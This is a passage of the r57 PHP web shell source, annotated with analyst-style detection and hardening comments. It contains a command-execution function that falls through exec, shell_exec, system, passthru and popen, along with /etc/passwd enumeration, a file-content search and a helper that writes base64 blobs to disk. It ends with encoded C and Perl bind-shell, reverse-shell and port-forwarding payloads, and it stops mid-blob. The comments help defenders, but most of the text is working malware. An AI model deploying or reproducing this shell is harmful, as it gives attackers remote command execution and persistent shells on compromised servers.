if(empty($dir))
{
    $os = getenv('OS');
    if(empty($os)){ $os = php_uname(); }
    if(empty($os)){ $os ="-"; $unix=1; }
    else
    {
        // eregi() was removed in PHP 7.0, so this branch only runs on PHP 5 and older;
        // the call helps date the sample.
        if(@eregi("^win",$os)) { $unix = 0; }
        else { $unix = 1; }
    }
}
// POST cmd=search_text: search file contents under s_dir for s_text and stop.
// Request shape (useful for WAF / log matching): POST fields s_dir, s_text,
// cmd=search_text, and optionally s_mask together with m (extension filter).
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
{
    echo $head;
    // The extension mask is only applied when both s_mask and m are non-empty.
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    // phrase=0, case=0: no word-boundary wrapping, case-insensitive match.
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    $titles = $sr->GetTitles();   // fetched but not used in this branch
    $r = "";
    if($found > 0)
    {
        $r .= "<TABLE width=100%>";
        // $res maps file path => (1-based line number => highlighted line).
        foreach($res as $file=>$v)
        {
            $r .= "<TR>";
            $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
            // On Windows the path is shown with backslashes.
            $r .= (!$unix)? str_replace("/","\\",$file) : $file;
            $r .= "</b></font></ TD>";
            $r .= "</TR>";
            foreach($v as $a=>$b)
            {
                $r .= "<TR>";
                $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
                $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
                $r .= "</TR>\n";
            }
        }
        $r .= "</TABLE>";
        echo $r;
    }
    else
    {
        // Localized "nothing found" message.
        echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
    die();
}
// Execution probe: if ex() cannot echo the marker back ("r57" sits at offset 3 of
// "abcr57"), the host is treated as safe_mode-restricted from here on.
// Detection: this runs whenever $safe_mode is falsy, so a web-server child process
// with the literal command line `echo abcr57` is a high-fidelity indicator.
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
/**
 * Layout padding: the spacer character repeated $i times.
 */
function ws($i)
{
    $padding = @str_repeat(" ",$i);
    return $padding;
}
/**
 * Run a command line through the first available process-execution primitive and
 * return what it printed.
 *
 * Order tried: exec, shell_exec, system, passthru, popen. function_exists() reports
 * functions listed in disable_functions as missing, so the chain falls through to
 * whichever primitive the hardening left enabled.
 *
 * Hardening note: disabling only some of these five is not sufficient; proc_open and
 * similar primitives are not used by this function but belong on the same list.
 * Detection note: every branch ends in a child process of the PHP/web-server worker,
 * which is what process auditing (auditd execve, EDR parent/child rules) will see.
 *
 * @param string $cfe command line, passed to the shell unmodified
 * @return mixed captured output; '' when $cfe is empty or no primitive is available
 */
function ex($cfe)
{
    $res = '';
    if (!empty($cfe))
    {
        if(function_exists('exec'))
        {
            // exec() fills $res with output lines; they are re-joined with "\n".
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec'))
        {
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system'))
        {
            // system() prints directly, so output buffering is used to capture it.
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru'))
        {
            // Same capture technique as for system().
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r")))
        {
            // Last resort: read the pipe in 1 KB chunks until EOF.
            $res = "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
/**
 * Collect the account names from /etc/passwd.
 *
 * Defensive note: the read uses file(), so it is governed by open_basedir and by
 * file permissions rather than by disable_functions.
 *
 * @return array|int list of first ':'-separated fields; 0 when the file cannot be
 *                   read or is empty
 */
function get_users()
{
    $users = array();
    $rows=file('/etc/passwd');   // not @-suppressed: a failure emits a PHP warning
    if(!$rows) return 0;
    foreach ($rows as $string)
    {
        $user = @explode(":",$string);
        // Lines starting with '#' are skipped as comments.
        if(substr($string,0,1)!='#') array_push($users,$user[0]);
    }
    return $users;
}
/**
 * Print a red, centered error banner.
 *
 * The text comes from the global $lang table under "<language>_err<n>"; a non-empty
 * $txt is appended after a single space.
 *
 * @param int|string $n   error number (suffix of the $lang key)
 * @param string     $txt optional detail text
 * @return null
 */
function err($n,$txt='')
{
    echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
    $key = $GLOBALS['language'].'_err'.$n;
    $message = $GLOBALS['lang'][$key];
    echo empty($txt) ? $message : $message." $txt";
    echo '</b></div></font></td></tr></table>';
    return null;
}
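/**
 * Render a stat() mode word as an `ls -l` style string such as "-rwxr-xr-x".
 *
 * @param int $mode st_mode value (file-type bits plus permission bits)
 * @return string|int ten-character string; 0 when $GLOBALS['unix'] is falsy
 */
function perms($mode)
{
    if (!$GLOBALS['unix']) return 0;

    // The file type is an enumerated value in the top four bits, not a set of
    // independent flags. Testing single bits in sequence reported block devices
    // (0x6000) and symlinks (0xA000) as 'c' and sockets (0xC000) as 'd'; comparing
    // the masked value gives each type its own letter.
    switch ($mode & 0xF000) {
        case 0x1000: $type = 'p'; break;
        case 0x2000: $type = 'c'; break;
        case 0x4000: $type = 'd'; break;
        case 0x6000: $type = 'b'; break;
        case 0x8000: $type = '-'; break;
        case 0xA000: $type = 'l'; break;
        case 0xC000: $type = 's'; break;
        default:     $type = 'u';
    }

    // read bit, write bit, execute bit, special bit, letter shown for the special bit
    // (0x800 setuid, 0x400 setgid, 0x200 sticky).
    $classes = array(
        array(00400, 00200, 00100, 0x800, 's'),
        array(00040, 00020, 00010, 0x400, 's'),
        array(00004, 00002, 00001, 0x200, 't'),
    );

    $s = $type;
    foreach ($classes as $class) {
        list($r, $w, $x, $special, $letter) = $class;
        $exec = ($mode & $x) ? 'x' : '-';
        if ($mode & $special) {
            // Lower case when the execute bit is also set, upper case otherwise.
            $exec = ($exec == 'x') ? $letter : strtoupper($letter);
        }
        $s .= (($mode & $r) ? 'r' : '-').(($mode & $w) ? 'w' : '-').$exec;
    }
    return $s;
}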
/**
 * Build an HTML <input> tag.
 *
 * Attributes are emitted unquoted except for value; nothing is HTML-escaped.
 *
 * @param string     $type    input type
 * @param string     $name    field name
 * @param int|string $size    size attribute, omitted when it compares equal to 0
 * @param string     $value   value attribute (wrapped in double quotes)
 * @param mixed      $checked truthy adds the "checked" attribute
 * @return string
 */
function in($type,$name,$size,$value,$checked=0)
{
    $attrs = array("type=".$type, "name=".$name);
    if($size != 0) { $attrs[] = "size=".$size; }
    $attrs[] = "value=\"".$value."\"";
    if($checked) { $attrs[] = "checked"; }
    return "<input ".implode(" ",$attrs).">";
}
/**
 * Resolve a program name to a path with the system `which` command.
 *
 * $pr is interpolated into the command line unquoted and run through ex(), so each
 * call spawns a shell. Falls back to the bare name when `which` prints nothing.
 *
 * @param string $pr program name
 * @return string output of `which` as returned by ex(), or $pr unchanged
 */
function which($pr)
{
    $path = ex("which $pr");
    if(!empty($path)) { return $path; } else { return $pr; }
}
/**
 * Write base64-decoded content to a file.
 *
 * Presumably the helper that writes the base64 blobs defined later in this file
 * ($port_bind_bd_c, $back_connect, $datapipe_c, ...) to disk - the call sites are
 * outside this excerpt. File-integrity monitoring on directories writable by the web
 * server is the matching control.
 *
 * @param string $fname destination path, opened with mode "w" (truncates)
 * @param string $text  base64-encoded content
 */
function cf($fname,$text)
{
    // On fopen failure err(0) prints the "can't write in file" banner.
    $w_file=@fopen($fname,"w") or err(0);
    if($w_file)
    {
        @fputs($w_file,@base64_decode($text));
        @fclose($w_file);
    }
}
/**
 * Build a two-cell table row: right-aligned label cell, left-aligned content cell.
 *
 * @param int|string $l  width of the first cell, in percent
 * @param string     $t1 HTML for the first cell
 * @param string     $t2 HTML for the second cell
 * @return string
 */
function sr($l,$t1,$t2)
{
    $labelCell = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
    $valueCell = "<td class=td1 align=left>".$t2."</td>";
    return "<tr class=tr1>".$labelCell.$valueCell."</tr>";
}
if (!@function_exists("view_size"))
{
    /**
     * Format a byte count with a B / KB / MB / GB suffix, rounded to two decimals.
     *
     * @param int|float $size size in bytes
     * @return string
     */
    function view_size($size)
    {
        // Largest unit first; the first threshold the size reaches wins.
        $units = array(
            1073741824 => " GB",
            1048576    => " MB",
            1024       => " KB",
        );
        foreach ($units as $divisor => $suffix) {
            if ($size >= $divisor) {
                return @round($size / $divisor * 100) / 100 . $suffix;
            }
        }
        return $size . " B";
    }
}
/**
 * Recursively list the files below a directory.
 *
 * @param string $dir   directory to walk
 * @param string $types optional ';'-separated list of extensions including the dot
 *                      (e.g. ".php;.inc"); empty means every file
 * @return array file paths built as "<dir>/<name>"; empty when $dir cannot be opened
 */
function DirFilesR($dir,$types='')
{
    $found = Array();
    $dh = @opendir($dir);
    if (!$dh) { return $found; }

    while (false !== ($entry = @readdir($dh)))
    {
        if ($entry == "." || $entry == "..") { continue; }

        $path = $dir."/".$entry;
        if (@is_dir($path))
        {
            // Descend and append the subdirectory's files.
            $found = @array_merge($found,DirFilesR($path,$types));
            continue;
        }

        // Extension = everything from the last dot to the end of the name.
        $dot = @strrpos($entry,".");
        $ext = @substr($entry,$dot,@strlen($entry)-$dot);
        if (!$types || @in_array($ext,explode(';',$types)))
        {
            $found[] = $path;
        }
    }
    @closedir($dh);
    return $found;
}
/**
 * Content search over a set of directories (grep-like), with highlighted results.
 *
 * Written in PHP 4 style: `var` properties and a constructor named after the class.
 * Since PHP 8.0 a method named after the class is no longer treated as a constructor,
 * so on PHP 8 `new SearchResult(...)` would leave every property unset - one more
 * sign that the sample targets PHP 4/5 hosts.
 */
class SearchResult
{
    var $text;               // raw search text as supplied by the caller
    var $FilesToSearch;      // flat list of file paths to scan
    var $ResultFiles;        // file path => (1-based line number => highlighted line)
    var $FilesTotal;         // count($FilesToSearch)
    var $MatchesCount;       // total number of matches over all files
    var $FileMatschesCount;  // declared with a typo; the code uses $FileMatchesCount (dynamic property)
    var $TimeStart;          // getmicrotime() at construction
    var $TimeTotal;          // seconds elapsed, set at the end of SearchText()
    var $titles;             // initialised to an empty array and not filled by this class

    /**
     * @param string $dir    one or more directories, ';'-separated
     * @param string $text   search text
     * @param string $filter optional extension filter passed to DirFilesR()
     */
    function SearchResult($dir,$text,$filter='')
    {
        $dirs = @explode(";",$dir);
        $this->FilesToSearch = Array();
        for($a=0;$a<count($dirs);$a++)
            $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
        $this->text = $text;
        $this->FilesTotal = @count($this->FilesToSearch);
        $this->TimeStart = getmicrotime();
        $this->MatchesCount = 0;
        $this->ResultFiles = Array();
        $this->FileMatchesCount = Array();
        $this->titles = Array();
    }
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }

    /**
     * Scan every file line by line and record the matching lines.
     *
     * @param mixed $phrase truthy wraps each word in \b...\b (whole-word match)
     * @param mixed $case   falsy makes the match case-insensitive
     */
    function SearchText($phrase=0,$case=0) {
        // The text is split on spaces and joined into a regex alternation. No
        // preg_quote() is applied, so the supplied text is interpreted as a regular
        // expression (the UI string "* you can use regexp" advertises this).
        $qq = @explode(' ',$this->text);
        $delim = '|';
        if($phrase)
            foreach($qq as $k=>$v)
                $qq[$k] = '\b'.$v.'\b';
        $words = '('.@implode($delim,$qq).')';
        $pattern = "/".$words."/";
        if(!$case)
            $pattern .= 'i';
        foreach($this->FilesToSearch as $k=>$filename)
        {
            $this->FileMatchesCount[$filename] = 0;
            // NOTE(review): `@next` is not a `continue`; it is a bare constant name that
            // is only evaluated when file() returns a falsy value. The loop below then
            // simply has nothing to iterate over.
            $FileStrings = @file($filename) or @next;
            for($a=0;$a<@count($FileStrings);$a++)
            {
                $count = 0;
                $CurString = $FileStrings[$a];
                $CurString = @Trim($CurString);
                // Tags are stripped before matching, so markup in the file is not
                // carried into the result page.
                $CurString = @strip_tags($CurString);
                $aa = '';
                if(($count = @preg_match_all($pattern,$CurString,$aa)))
                {
                    // Wrap each match in a highlight span and store the line under
                    // its 1-based line number.
                    $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
                    $this->ResultFiles[$filename][$a+1] = $CurString;
                    $this->MatchesCount += $count;
                    $this->FileMatchesCount[$filename] += $count;
                }
            }
        }
        $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
}
/**
 * Current Unix time as a float with microsecond resolution.
 *
 * microtime() returns the string "usec sec"; both parts are cast and added.
 *
 * @return float
 */
function getmicrotime()
{
    $parts = @explode(" ",@microtime());
    $fraction = (float)$parts[0];
    $seconds = (float)$parts[1];
    return ($fraction + $seconds);
}
1371 $port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
1372 A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
1373 GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
1374 b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
1375 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
1376 NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
1377 ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
1378 ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
1379 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
1380 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
1381 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
1382 dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
1383 lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
1384 $port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
1385 VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
1386 JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
1387 TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
1388 lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
1389 Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
1390 Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
1391 lIENPTk47DQpleGl0IDA7DQp9DQp9";
1392 $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
1393 aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
1394 hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
1395 sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
1396 kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
1397 KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
1398 OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1399 $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
1400 BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
1401 SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
1402 KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
1403 sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
1404 Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
1405 QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
1406 Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1407 $datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
1408 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
1409 HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
1410 aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
1411 lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
1412 xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
1413 W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
1414 LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
1415 udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
1416 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
1417 iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
1418 KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
1419 gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
1420 hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
1421 iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
1422 ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
1423 vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
1424 AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
1425 QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
1426 ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
1427 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
1428 wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
1429 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
1430 MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
1431 gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
1432 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
1433 HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
1434 dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
1435 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
1436 ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
1437 E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
1438 Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
1439 NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
1440 J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
1441 CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
1442 dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
1443 gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
1444 lsZSk7DQogIHJldHVybiAwOw0KfQ==";
1445 $datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
